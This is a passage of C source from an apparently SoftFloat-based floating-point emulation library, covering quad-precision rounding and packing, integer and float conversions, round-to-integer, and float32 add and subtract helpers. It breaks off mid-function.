static inline float128
 packFloat128( flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1 )
{
    float128 z;

    z.low = zSig1;
    /* Fields are combined with '+' so a carry out of zSig0 propagates
       into the exponent (see the comment above). */
    z.high = ( ( (uint64_t) zSign )<<63 ) + ( ( (uint64_t) zExp )<<48 ) + zSig0;
    return z;

}

/*----------------------------------------------------------------------------
| Takes an abstract floating-point value having sign `zSign', exponent `zExp',
| and extended significand formed by the concatenation of `zSig0', `zSig1',
| and `zSig2', and returns the proper quadruple-precision floating-point value
| corresponding to the abstract input.  Ordinarily, the abstract value is
| simply rounded and packed into the quadruple-precision format, with the
| inexact exception raised if the abstract input cannot be represented
| exactly.  However, if the abstract value is too large, the overflow and
| inexact exceptions are raised and an infinity or maximal finite value is
| returned.  If the abstract value is too small, the input value is rounded to
| a subnormal number, and the underflow and inexact exceptions are raised if
| the abstract input cannot be represented exactly as a subnormal quadruple-
| precision floating-point number.
|     The input significand must be normalized or smaller.  If the input
| significand is not normalized, `zExp' must be 0; in that case, the result
| returned is a subnormal number, and it must not require rounding.  In the
| usual case that the input significand is normalized, `zExp' must be 1 less
| than the ``true'' floating-point exponent.  The handling of underflow and
| overflow follows the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float128
 roundAndPackFloat128(
     flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1, uint64_t zSig2 STATUS_PARAM)
{
    int8 roundingMode;
    flag roundNearestEven, increment = 0, isTiny;

    roundingMode = STATUS(float_rounding_mode);
    roundNearestEven = ( roundingMode == float_round_nearest_even );
    /* zSig2 holds the round/sticky bits below the 113-bit significand. */
    switch (roundingMode) {
    case float_round_nearest_even:
    case float_round_ties_away:
        increment = ((int64_t)zSig2 < 0);
        break;
    case float_round_to_zero:
        increment = 0;
        break;
    case float_round_up:
        increment = !zSign && zSig2;
        break;
    case float_round_down:
        increment = zSign && zSig2;
        break;
    default:
        float_raise(float_flag_invalid STATUS_VAR);
        break;
    }
    /* The unsigned compare catches both zExp too large (overflow) and
       negative zExp (underflow towards a subnormal). */
    if ( 0x7FFD <= (uint32_t) zExp ) {
        if (    ( 0x7FFD < zExp )
             || (    ( zExp == 0x7FFD )
                  && eq128(
                         LIT64( 0x0001FFFFFFFFFFFF ),
                         LIT64( 0xFFFFFFFFFFFFFFFF ),
                         zSig0,
                         zSig1
                     )
                  && increment
                )
           ) {
            float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR);
            if (    ( roundingMode == float_round_to_zero )
                 || ( zSign && ( roundingMode == float_round_up ) )
                 || ( ! zSign && ( roundingMode == float_round_down ) )
               ) {
                /* Rounding away from infinity: largest finite value. */
                return
                    packFloat128(
                        zSign,
                        0x7FFE,
                        LIT64( 0x0000FFFFFFFFFFFF ),
                        LIT64( 0xFFFFFFFFFFFFFFFF )
                    );
            }
            return packFloat128( zSign, 0x7FFF, 0, 0 );
        }
        if ( zExp < 0 ) {
            if (STATUS(flush_to_zero)) {
                float_raise(float_flag_output_denormal STATUS_VAR);
                return packFloat128(zSign, 0, 0, 0);
            }
            isTiny =
                   ( STATUS(float_detect_tininess) == float_tininess_before_rounding )
                || ( zExp < -1 )
                || ! increment
                || lt128(
                       zSig0,
                       zSig1,
                       LIT64( 0x0001FFFFFFFFFFFF ),
                       LIT64( 0xFFFFFFFFFFFFFFFF )
                   );
            shift128ExtraRightJamming(
                zSig0, zSig1, zSig2, - zExp, &zSig0, &zSig1, &zSig2 );
            zExp = 0;
            if ( isTiny && zSig2 ) float_raise( float_flag_underflow STATUS_VAR);
            /* Recompute the rounding decision on the shifted significand. */
            switch (roundingMode) {
            case float_round_nearest_even:
            case float_round_ties_away:
                increment = ((int64_t)zSig2 < 0);
                break;
            case float_round_to_zero:
                increment = 0;
                break;
            case float_round_up:
                increment = !zSign && zSig2;
                break;
            case float_round_down:
                increment = zSign && zSig2;
                break;
            default:
                float_raise(float_flag_invalid STATUS_VAR);
                break;
            }
        }
    }
    if ( zSig2 ) STATUS(float_exception_flags) |= float_flag_inexact;
    if ( increment ) {
        add128( zSig0, zSig1, 0, 1, &zSig0, &zSig1 );
        /* On an exact tie, clear the LSB so the result is even. */
        zSig1 &= ~ ( ( zSig2 + zSig2 == 0 ) & roundNearestEven );
    }
    else {
        if ( ( zSig0 | zSig1 ) == 0 ) zExp = 0;
    }
    return packFloat128( zSign, zExp, zSig0, zSig1 );

}

/*----------------------------------------------------------------------------
| Takes an abstract floating-point value having sign `zSign', exponent `zExp',
| and significand formed by the concatenation of `zSig0' and `zSig1', and
| returns the proper quadruple-precision floating-point value corresponding
| to the abstract input.  This routine is just like `roundAndPackFloat128'
| except that the input significand has fewer bits and does not have to be
| normalized.  In all cases, `zExp' must be 1 less than the ``true'' floating-
| point exponent.
*----------------------------------------------------------------------------*/

static float128
 normalizeRoundAndPackFloat128(
     flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1 STATUS_PARAM)
{
    int8 shiftCount;
    uint64_t zSig2;

    if ( zSig0 == 0 ) {
        /* High word empty: promote the low word, adjust the exponent. */
        zSig0 = zSig1;
        zSig1 = 0;
        zExp -= 64;
    }
    /* 15 = 63 - 48: align the leading 1 with the quad significand top. */
    shiftCount = countLeadingZeros64( zSig0 ) - 15;
    if ( 0 <= shiftCount ) {
        zSig2 = 0;
        shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 );
    }
    else {
        shift128ExtraRightJamming(
            zSig0, zSig1, 0, - shiftCount, &zSig0, &zSig1, &zSig2 );
    }
    zExp -= shiftCount;
    return roundAndPackFloat128( zSign, zExp, zSig0, zSig1, zSig2 STATUS_VAR);

}

/*----------------------------------------------------------------------------
| Returns the result of converting the 32-bit two's complement integer `a'
| to the single-precision floating-point format.  The conversion is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float32 int32_to_float32(int32_t a STATUS_PARAM)
{
    flag zSign;

    if ( a == 0 ) return float32_zero;
    /* INT32_MIN cannot be negated; it is handled as the exact value -2^31. */
    if ( a == (int32_t) 0x80000000 ) return packFloat32( 1, 0x9E, 0 );
    zSign = ( a < 0 );
    return normalizeRoundAndPackFloat32( zSign, 0x9C, zSign ? - a : a STATUS_VAR );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the 32-bit two's complement integer `a'
| to the double-precision floating-point format.  The conversion is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float64 int32_to_float64(int32_t a STATUS_PARAM)
{
    flag zSign;
    uint32 absA;
    int8 shiftCount;
    uint64_t zSig;

    if ( a == 0 ) return float64_zero;
    zSign = ( a < 0 );
    /* Guard avoids negating INT32_MIN; the 0x80000000 bit pattern already
       has the correct magnitude as an unsigned value. */
    absA = (zSign && (a != 0x80000000)) ? - a : a;
    shiftCount = countLeadingZeros32( absA ) + 21;
    zSig = absA;
    /* Every int32 is exactly representable in double: no rounding needed. */
    return packFloat64( zSign, 0x432 - shiftCount, zSig<<shiftCount );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the 32-bit two's complement integer `a'
| to the extended double-precision floating-point format.  The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 int32_to_floatx80(int32_t a STATUS_PARAM)
{
    flag zSign;
    uint32 absA;
    int8 shiftCount;
    uint64_t zSig;

    if ( a == 0 ) return packFloatx80( 0, 0, 0 );
    zSign = ( a < 0 );
    /* See int32_to_float64 for the INT32_MIN guard. */
    absA = (zSign && a != 0x80000000) ? - a : a;
    shiftCount = countLeadingZeros32( absA ) + 32;
    zSig = absA;
    return packFloatx80( zSign, 0x403E - shiftCount, zSig<<shiftCount );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the 32-bit two's complement integer `a' to
| the quadruple-precision floating-point format.  The conversion is performed
| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 int32_to_float128(int32_t a STATUS_PARAM)
{
    flag zSign;
    uint32 absA;
    int8 shiftCount;
    uint64_t zSig0;

    if ( a == 0 ) return packFloat128( 0, 0, 0, 0 );
    zSign = ( a < 0 );
    /* See int32_to_float64 for the INT32_MIN guard. */
    absA = (zSign && a!= 0x80000000) ? - a : a;
    shiftCount = countLeadingZeros32( absA ) + 17;
    zSig0 = absA;
    return packFloat128( zSign, 0x402E - shiftCount, zSig0<<shiftCount, 0 );

}

/*----------------------------------------------------------------------------
| Returns the result of converting the 64-bit two's complement integer `a'
| to the single-precision floating-point format.
The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 int64_to_float32(int64_t a STATUS_PARAM) +{ + flag zSign; + uint64 absA; + int8 shiftCount; + + if ( a == 0 ) return float32_zero; + zSign = ( a < 0 ); + absA = (zSign && a != 0x8000000000000000ULL) ? - a : a; + shiftCount = countLeadingZeros64( absA ) - 40; + if ( 0 <= shiftCount ) { + return packFloat32( zSign, 0x95 - shiftCount, (uint32_t)(absA<<shiftCount) ); + } + else { + shiftCount += 7; + if ( shiftCount < 0 ) { + shift64RightJamming( absA, - shiftCount, &absA ); + } + else { + absA <<= shiftCount; + } + return roundAndPackFloat32( zSign, 0x9C - shiftCount, (uint32_t)absA STATUS_VAR ); + } + +} + +float32 uint64_to_float32(uint64_t a STATUS_PARAM) +{ + int8 shiftCount; + + if ( a == 0 ) return float32_zero; + shiftCount = countLeadingZeros64( a ) - 40; + if ( 0 <= shiftCount ) { + return packFloat32(0, 0x95 - shiftCount, (uint32_t)(a<<shiftCount)); + } + else { + shiftCount += 7; + if ( shiftCount < 0 ) { + shift64RightJamming( a, - shiftCount, &a ); + } + else { + a <<= shiftCount; + } + return roundAndPackFloat32(0, 0x9C - shiftCount, (uint32_t)a STATUS_VAR); + } +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 64-bit two's complement integer `a' +| to the double-precision floating-point format. The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 int64_to_float64(int64_t a STATUS_PARAM) +{ + flag zSign; + + if ( a == 0 ) return float64_zero; + if ( a == (int64_t) LIT64( 0x8000000000000000 ) ) { + return packFloat64( 1, 0x43E, 0 ); + } + zSign = ( a < 0 ); + return normalizeRoundAndPackFloat64( zSign, 0x43C, zSign ? 
- a : a STATUS_VAR ); + +} + +float64 uint64_to_float64(uint64_t a STATUS_PARAM) +{ + int exp = 0x43C; + + if (a == 0) { + return float64_zero; + } + if ((int64_t)a < 0) { + shift64RightJamming(a, 1, &a); + exp += 1; + } + return normalizeRoundAndPackFloat64(0, exp, a STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 64-bit two's complement integer `a' +| to the extended double-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 int64_to_floatx80(int64_t a STATUS_PARAM) +{ + flag zSign; + uint64 absA; + int8 shiftCount; + + if ( a == 0 ) return packFloatx80( 0, 0, 0 ); + zSign = ( a < 0 ); + absA = (zSign && a != 0x8000000000000000ULL) ? - a : a; + shiftCount = countLeadingZeros64( absA ); + return packFloatx80( zSign, 0x403E - shiftCount, absA<<shiftCount ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the 64-bit two's complement integer `a' to +| the quadruple-precision floating-point format. The conversion is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 int64_to_float128(int64_t a STATUS_PARAM) +{ + flag zSign; + uint64 absA; + int8 shiftCount; + int32 zExp; + uint64_t zSig0, zSig1; + + if ( a == 0 ) return packFloat128( 0, 0, 0, 0 ); + zSign = ( a < 0 ); + absA = (zSign && a!= 0x8000000000000000ULL) ? 
- a : a; + shiftCount = countLeadingZeros64( absA ) + 49; + zExp = 0x406E - shiftCount; + if ( 64 <= shiftCount ) { + zSig1 = 0; + zSig0 = absA; + shiftCount -= 64; + } + else { + zSig1 = absA; + zSig0 = 0; + } + shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); + return packFloat128( zSign, zExp, zSig0, zSig1 ); + +} + +float128 uint64_to_float128(uint64_t a STATUS_PARAM) +{ + if (a == 0) { + float128 zero = {0}; + return zero; + } + return normalizeRoundAndPackFloat128(0, 0x406E, a, 0 STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 32-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. Otherwise, if the conversion overflows, the +| largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int32 float32_to_int32( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + uint64_t aSig64; + + a = float32_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( ( aExp == 0xFF ) && aSig ) aSign = 0; + if ( aExp ) aSig |= 0x00800000; + shiftCount = 0xAF - aExp; + aSig64 = aSig; + aSig64 <<= 32; + if ( 0 < shiftCount ) shift64RightJamming( aSig64, shiftCount, &aSig64 ); + return roundAndPackInt32( aSign, aSig64 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 32-bit two's complement integer format. 
The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. +| If `a' is a NaN, the largest positive integer is returned. Otherwise, if +| the conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int32 float32_to_int32_round_to_zero( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + int32_t z; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + shiftCount = aExp - 0x9E; + if ( 0 <= shiftCount ) { + if ( float32_val(a) != 0xCF000000 ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0xFF ) && aSig ) ) return 0x7FFFFFFF; + } + return (int32_t) 0x80000000; + } + else if ( aExp <= 0x7E ) { + if ( aExp | aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + aSig = ( aSig | 0x00800000 )<<8; + z = aSig>>( - shiftCount ); + if ( (uint32_t) ( aSig<<( shiftCount & 31 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + if ( aSign ) z = - z; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 16-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. +| If `a' is a NaN, the largest positive integer is returned. Otherwise, if +| the conversion overflows, the largest integer with the same sign as `a' is +| returned. 
+*----------------------------------------------------------------------------*/ + +int_fast16_t float32_to_int16_round_to_zero(float32 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + int32 z; + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + shiftCount = aExp - 0x8E; + if ( 0 <= shiftCount ) { + if ( float32_val(a) != 0xC7000000 ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0xFF ) && aSig ) ) { + return 0x7FFF; + } + } + return (int32_t) 0xffff8000; + } + else if ( aExp <= 0x7E ) { + if ( aExp | aSig ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return 0; + } + shiftCount -= 0x10; + aSig = ( aSig | 0x00800000 )<<8; + z = aSig>>( - shiftCount ); + if ( (uint32_t) ( aSig<<( shiftCount & 31 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + if ( aSign ) { + z = - z; + } + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 64-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. Otherwise, if the conversion overflows, the +| largest integer with the same sign as `a' is returned. 
+*----------------------------------------------------------------------------*/ + +int64 float32_to_int64( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + uint64_t aSig64, aSigExtra; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + shiftCount = 0xBE - aExp; + if ( shiftCount < 0 ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0xFF ) && aSig ) ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + if ( aExp ) aSig |= 0x00800000; + aSig64 = aSig; + aSig64 <<= 40; + shift64ExtraRightJamming( aSig64, 0, shiftCount, &aSig64, &aSigExtra ); + return roundAndPackInt64( aSign, aSig64, aSigExtra STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 64-bit unsigned integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| unsigned integer is returned. Otherwise, if the conversion overflows, the +| largest unsigned integer is returned. If the 'a' is negative, the result +| is rounded and zero is returned; values that do not round to zero will +| raise the inexact exception flag. 
+*----------------------------------------------------------------------------*/ + +uint64 float32_to_uint64(float32 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + uint64_t aSig64, aSigExtra; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac(a); + aExp = extractFloat32Exp(a); + aSign = extractFloat32Sign(a); + if ((aSign) && (aExp > 126)) { + float_raise(float_flag_invalid STATUS_VAR); + if (float32_is_any_nan(a)) { + return LIT64(0xFFFFFFFFFFFFFFFF); + } else { + return 0; + } + } + shiftCount = 0xBE - aExp; + if (aExp) { + aSig |= 0x00800000; + } + if (shiftCount < 0) { + float_raise(float_flag_invalid STATUS_VAR); + return LIT64(0xFFFFFFFFFFFFFFFF); + } + + aSig64 = aSig; + aSig64 <<= 40; + shift64ExtraRightJamming(aSig64, 0, shiftCount, &aSig64, &aSigExtra); + return roundAndPackUint64(aSign, aSig64, aSigExtra STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 64-bit unsigned integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. If +| `a' is a NaN, the largest unsigned integer is returned. Otherwise, if the +| conversion overflows, the largest unsigned integer is returned. If the +| 'a' is negative, the result is rounded and zero is returned; values that do +| not round to zero will raise the inexact flag. 
+*----------------------------------------------------------------------------*/ + +uint64 float32_to_uint64_round_to_zero(float32 a STATUS_PARAM) +{ + int64_t v; + signed char current_rounding_mode = STATUS(float_rounding_mode); + set_float_rounding_mode(float_round_to_zero STATUS_VAR); + v = float32_to_uint64(a STATUS_VAR); + set_float_rounding_mode(current_rounding_mode STATUS_VAR); + return v; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the 64-bit two's complement integer format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. If +| `a' is a NaN, the largest positive integer is returned. Otherwise, if the +| conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int64 float32_to_int64_round_to_zero( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp, shiftCount; + uint32_t aSig; + uint64_t aSig64; + int64 z; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + shiftCount = aExp - 0xBE; + if ( 0 <= shiftCount ) { + if ( float32_val(a) != 0xDF000000 ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! 
aSign || ( ( aExp == 0xFF ) && aSig ) ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + else if ( aExp <= 0x7E ) { + if ( aExp | aSig ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + aSig64 = aSig | 0x00800000; + aSig64 <<= 40; + z = aSig64>>( - shiftCount ); + if ( (uint64_t) ( aSig64<<( shiftCount & 63 ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + if ( aSign ) z = - z; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the double-precision floating-point format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float32_to_float64( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + a = float32_squash_input_denormal(a STATUS_VAR); + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( aExp == 0xFF ) { + if ( aSig ) return commonNaNToFloat64( float32ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloat64( aSign, 0x7FF, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat64( aSign, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + --aExp; + } + return packFloat64( aSign, aExp + 0x380, ( (uint64_t) aSig )<<29 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the extended double-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. 
+*----------------------------------------------------------------------------*/ + +floatx80 float32_to_floatx80( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + + a = float32_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( aExp == 0xFF ) { + if ( aSig ) return commonNaNToFloatx80( float32ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloatx80( aSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloatx80( aSign, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + } + aSig |= 0x00800000; + return packFloatx80( aSign, aExp + 0x3F80, ( (uint64_t) aSig )<<40 ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the single-precision floating-point value +| `a' to the double-precision floating-point format. The conversion is +| performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float128 float32_to_float128( float32 a STATUS_PARAM ) +{ + flag aSign; + int_fast16_t aExp; + uint32_t aSig; + + a = float32_squash_input_denormal(a STATUS_VAR); + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + aSign = extractFloat32Sign( a ); + if ( aExp == 0xFF ) { + if ( aSig ) return commonNaNToFloat128( float32ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + return packFloat128( aSign, 0x7FFF, 0, 0 ); + } + if ( aExp == 0 ) { + if ( aSig == 0 ) return packFloat128( aSign, 0, 0, 0 ); + normalizeFloat32Subnormal( aSig, &aExp, &aSig ); + --aExp; + } + return packFloat128( aSign, aExp + 0x3F80, ( (uint64_t) aSig )<<25, 0 ); + +} + +/*---------------------------------------------------------------------------- +| Rounds the single-precision floating-point value `a' to an integer, and +| returns the result as a single-precision floating-point value. The +| operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +float32 float32_round_to_int( float32 a STATUS_PARAM) +{ + flag aSign; + int_fast16_t aExp; + uint32_t lastBitMask, roundBitsMask; + uint32_t z; + a = float32_squash_input_denormal(a STATUS_VAR); + + aExp = extractFloat32Exp( a ); + if ( 0x96 <= aExp ) { + if ( ( aExp == 0xFF ) && extractFloat32Frac( a ) ) { + return propagateFloat32NaN( a, a STATUS_VAR ); + } + return a; + } + if ( aExp <= 0x7E ) { + if ( (uint32_t) ( float32_val(a)<<1 ) == 0 ) return a; + STATUS(float_exception_flags) |= float_flag_inexact; + aSign = extractFloat32Sign( a ); + switch ( STATUS(float_rounding_mode) ) { + case float_round_nearest_even: + if ( ( aExp == 0x7E ) && extractFloat32Frac( a ) ) { + return packFloat32( aSign, 0x7F, 0 ); + } + break; + case float_round_ties_away: + if (aExp == 0x7E) { + return packFloat32(aSign, 0x7F, 0); + } + break; + case float_round_down: + return make_float32(aSign ? 0xBF800000 : 0); + case float_round_up: + return make_float32(aSign ? 
0x80000000 : 0x3F800000); + } + return packFloat32( aSign, 0, 0 ); + } + lastBitMask = 1; + lastBitMask <<= 0x96 - aExp; + roundBitsMask = lastBitMask - 1; + z = float32_val(a); + switch (STATUS(float_rounding_mode)) { + case float_round_nearest_even: + z += lastBitMask>>1; + if ((z & roundBitsMask) == 0) { + z &= ~lastBitMask; + } + break; + case float_round_ties_away: + z += lastBitMask >> 1; + break; + case float_round_to_zero: + break; + case float_round_up: + if (!extractFloat32Sign(make_float32(z))) { + z += roundBitsMask; + } + break; + case float_round_down: + if (extractFloat32Sign(make_float32(z))) { + z += roundBitsMask; + } + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + z &= ~ roundBitsMask; + if ( z != float32_val(a) ) STATUS(float_exception_flags) |= float_flag_inexact; + return make_float32(z); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the absolute values of the single-precision +| floating-point values `a' and `b'. If `zSign' is 1, the sum is negated +| before being returned. `zSign' is ignored if the result is a NaN. +| The addition is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. 
+*----------------------------------------------------------------------------*/ + +static float32 addFloat32Sigs( float32 a, float32 b, flag zSign STATUS_PARAM) +{ + int_fast16_t aExp, bExp, zExp; + uint32_t aSig, bSig, zSig; + int_fast16_t expDiff; + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + expDiff = aExp - bExp; + aSig <<= 6; + bSig <<= 6; + if ( 0 < expDiff ) { + if ( aExp == 0xFF ) { + if ( aSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + --expDiff; + } + else { + bSig |= 0x20000000; + } + shift32RightJamming( bSig, expDiff, &bSig ); + zExp = aExp; + } + else if ( expDiff < 0 ) { + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return packFloat32( zSign, 0xFF, 0 ); + } + if ( aExp == 0 ) { + ++expDiff; + } + else { + aSig |= 0x20000000; + } + shift32RightJamming( aSig, - expDiff, &aSig ); + zExp = bExp; + } + else { + if ( aExp == 0xFF ) { + if ( aSig | bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return a; + } + if ( aExp == 0 ) { + if (STATUS(flush_to_zero)) { + if (aSig | bSig) { + float_raise(float_flag_output_denormal STATUS_VAR); + } + return packFloat32(zSign, 0, 0); + } + return packFloat32( zSign, 0, ( aSig + bSig )>>6 ); + } + zSig = 0x40000000 + aSig + bSig; + zExp = aExp; + goto roundAndPack; + } + aSig |= 0x20000000; + zSig = ( aSig + bSig )<<1; + --zExp; + if ( (int32_t) zSig < 0 ) { + zSig = aSig + bSig; + ++zExp; + } + roundAndPack: + return roundAndPackFloat32( zSign, zExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the absolute values of the single- +| precision floating-point values `a' and `b'. If `zSign' is 1, the +| difference is negated before being returned. `zSign' is ignored if the +| result is a NaN. 
The subtraction is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float32 subFloat32Sigs( float32 a, float32 b, flag zSign STATUS_PARAM) +{ + int_fast16_t aExp, bExp, zExp; + uint32_t aSig, bSig, zSig; + int_fast16_t expDiff; + + aSig = extractFloat32Frac( a ); + aExp = extractFloat32Exp( a ); + bSig = extractFloat32Frac( b ); + bExp = extractFloat32Exp( b ); + expDiff = aExp - bExp; + aSig <<= 7; + bSig <<= 7; + if ( 0 < expDiff ) goto aExpBigger; + if ( expDiff < 0 ) goto bExpBigger; + if ( aExp == 0xFF ) { + if ( aSig | bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + float_raise( float_flag_invalid STATUS_VAR); + return float32_default_nan; + } + if ( aExp == 0 ) { + aExp = 1; + bExp = 1; + } + if ( bSig < aSig ) goto aBigger; + if ( aSig < bSig ) goto bBigger; + return packFloat32( STATUS(float_rounding_mode) == float_round_down, 0, 0 ); + bExpBigger: + if ( bExp == 0xFF ) { + if ( bSig ) return propagateFloat32NaN( a, b STATUS_VAR ); + return packFloat32( zSign ^ 1, 0xFF, 0 ); + } + if ( aExp == 0 ) { + ++expDiff; + } + else { + aSig |= 0x40000000; + } + shift32RightJamming( 